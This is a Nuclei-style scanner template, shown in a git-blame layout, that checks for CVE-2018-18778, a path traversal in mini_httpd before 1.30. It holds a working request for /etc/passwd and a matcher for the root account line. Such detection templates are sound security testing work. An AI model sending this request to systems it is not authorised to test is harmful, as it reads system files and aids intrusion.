2021-02-25 16:05:18 +00:00
|
|
|
id: CVE-2018-18778
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: mini_httpd Path Traversal
|
|
|
|
author: dhiyaneshDK
|
2021-09-10 11:26:40 +00:00
|
|
|
severity: medium
|
2021-03-11 16:22:34 +00:00
|
|
|
description: ACME mini_httpd before 1.30 lets remote users read arbitrary files.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/
|
2022-05-17 09:18:12 +00:00
|
|
|
- http://www.acme.com/software/mini_httpd/
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 6.5
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2018-18778
|
|
|
|
cwe-id: CWE-200
|
2022-04-22 10:38:41 +00:00
|
|
|
tags: cve,cve2018,lfi
|
2021-03-11 16:22:34 +00:00
|
|
|
|
2021-02-25 16:05:18 +00:00
|
|
|
requests:
|
|
|
|
- raw:
|
|
|
|
- |+
|
|
|
|
GET /etc/passwd HTTP/1.1
|
2021-03-11 20:16:35 +00:00
|
|
|
Host:
|
2021-02-25 16:05:18 +00:00
|
|
|
|
|
|
|
unsafe: true
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2021-09-08 12:17:19 +00:00
|
|
|
|
2021-02-25 16:05:18 +00:00
|
|
|
- type: regex
|
|
|
|
regex:
|
2021-07-24 21:35:55 +00:00
|
|
|
- "root:.*:0:0:"
|